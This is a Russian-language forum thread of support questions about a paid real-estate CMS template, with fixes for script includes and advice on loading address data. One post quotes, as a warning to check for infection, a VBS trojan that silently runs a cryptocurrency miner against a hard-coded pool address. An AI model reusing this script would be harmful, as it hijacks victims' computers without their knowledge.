MrFallen

Шаблон Real Spaces

Recommended Posts

Купил шаблон, а он кривоват, увидеть это можно зайдя на мой демо сайт - www.facechoose.ru. Как исправить чтобы кнопки поиска были из twitter bootstrap, а не стандартные windows? Как настроить карту? Как исправить блок специальные предложения?

 

Заранее спасибо за помощь. :)

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

у вас не всё подгружается. проверьте каталог /template/frontend/real-spaces/plugins/ или перезалейте шаблон.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

в main.tpl перенесите 

следующий код в файл header.tpl

вставте после строки

<script type="text/javascript" src="https://maps.google.com/maps/api/js?sensor=true"></script>

<script src="{$estate_folder}/template/frontend/{$current_theme_name}/js/modernizr.js"></script><!-- Modernizr --><script src="{$estate_folder}/template/frontend/{$current_theme_name}/js/jquery-2.0.0.min.js"></script> <!-- Jquery Library Call --><script src="{$estate_folder}/template/frontend/{$current_theme_name}/plugins/prettyphoto/js/prettyphoto.js"></script> <!-- PrettyPhoto Plugin --><script src="{$estate_folder}/template/frontend/{$current_theme_name}/plugins/owl-carousel/js/owl.carousel.min.js"></script> <!-- Owl Carousel --><script src="{$estate_folder}/template/frontend/{$current_theme_name}/plugins/flexslider/js/jquery.flexslider.js"></script> <!-- FlexSlider --><script src="{$estate_folder}/template/frontend/{$current_theme_name}/js/helper-plugins.js"></script> <!-- Plugins --><script src="{$estate_folder}/template/frontend/{$current_theme_name}/js/bootstrap.js"></script> <!-- UI --><script src="{$estate_folder}/template/frontend/{$current_theme_name}/js/waypoints.js"></script> <!-- Waypoints --><script src="{$estate_folder}/template/frontend/{$current_theme_name}/js/init.js"></script> <!-- All Scripts -->

так же в header.tpl замените строку

<link rel="stylesheet" href="{$estate_folder}/template/frontend/agency/jquery-ui/themes/base/jquery.ui.all.css">

на 

<link rel="stylesheet" href="{$estate_folder}/template/frontend/{$current_theme_name/jquery-ui/themes/base/jquery.ui.all.css">

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

TopRan: имхо чтобы юзер сам не правил, (по каким-либо причинам).  перезалей и тогда ему можно скачать из личного кабинета.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

правку залил, теперь дистрибутив раньше понедельника не обновиться.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Важно!

Внимательно проверьте свой компьютер, особенно разделы автозагрузок . Если у вас имеется файл с расширением VBS - пример (t2.vbs) со следующим содержимым

Set WshShell = CreateObject("WScript.Shell")WshShell.Run Chr(34) & "%APPDATA%\poclbm\poclbm.exe" & Chr(34) & "http://user:pass@37.10.104.2:9332 -d 0 -w128 -f60",0WshShell.Run Chr(34) & "%APPDATA%\poclbm\poclbm.exe" & Chr(34) & "http://user:pass@37.10.104.2:9332 -d 1 -w128 -f60",0

значит у вас на компьютере троян. именно из за него и ругается на многие сайты.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Будем разбираться.

Отчет:

Шаблон был полностью проверен на вредоносный код - такого не обнаружено в шаблоне и его библиотеках.

шаблон был установлен на 3 разных доменах. При сканировании данных доменов вредоносного кода не показало.

так же были просканированы сайты покупателей данного шаблона. также показало отсутствие вредоносного кода.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Доброго времени суток. Ни как не могу найти в каком файле правится шаблон "сайт.рф/account/profile/" ?

 

И еще вопрос, города, улицы, дома... Это всё нужно руками добавлять? Есть способ, чтобы всё быстро перенести из чего-нибудь готового?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Доброго времени суток. Ни как не могу найти в каком файле правится шаблон "сайт.рф/account/profile/" ?

Это таблица Users

 

 

И еще вопрос, города, улицы, дома... Это всё нужно руками добавлять? Есть способ, чтобы всё быстро перенести из чего-нибудь готового?

Есть база кладр. Вот из нее возьтете улицы для нужного вам города. http://www.etown.ru/s/topic/458-регионы-и-города-рф-улицы/?p=19203 А вот дома вы должны сами забиватью (т.е. те объекты которые продаете). Или воспользоваться excel загрузкой-выгрузкой

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Это таблица Users

Извините, а можно подробнее? Нормальной документации по CMS нет. Очень сложно ориентироваться.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Админка - редактор форм - таблица users

Я о верстке. Кстати, когда шаблон Real Spaces будет полностью исправлен от недочётов?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Я о верстке. Кстати, когда шаблон Real Spaces будет полностью исправлен от недочётов?

Верстка этой страницы создается автоматически, шаблона этой формы нет.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Что вы считаете недочетами, кроме чекбокса при авторизации?

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Много мелких недоработок, которые так и лезут в глаза. Зато 2900 просят за шаблон. Я думаю нужна модерация шаблонов. Взять в пример CMS LiveStreet. Всё на высшем уровне.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Много мелких недоработок, которые так и лезут в глаза. Зато 2900 просят за шаблон. Я думаю нужна модерация шаблонов. Взять в пример CMS LiveStreet. Всё на высшем уровне.

Шаблон новый, поэтому вполне возможны недочеты.

Пишите, будем править.

Поделиться сообщением


Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас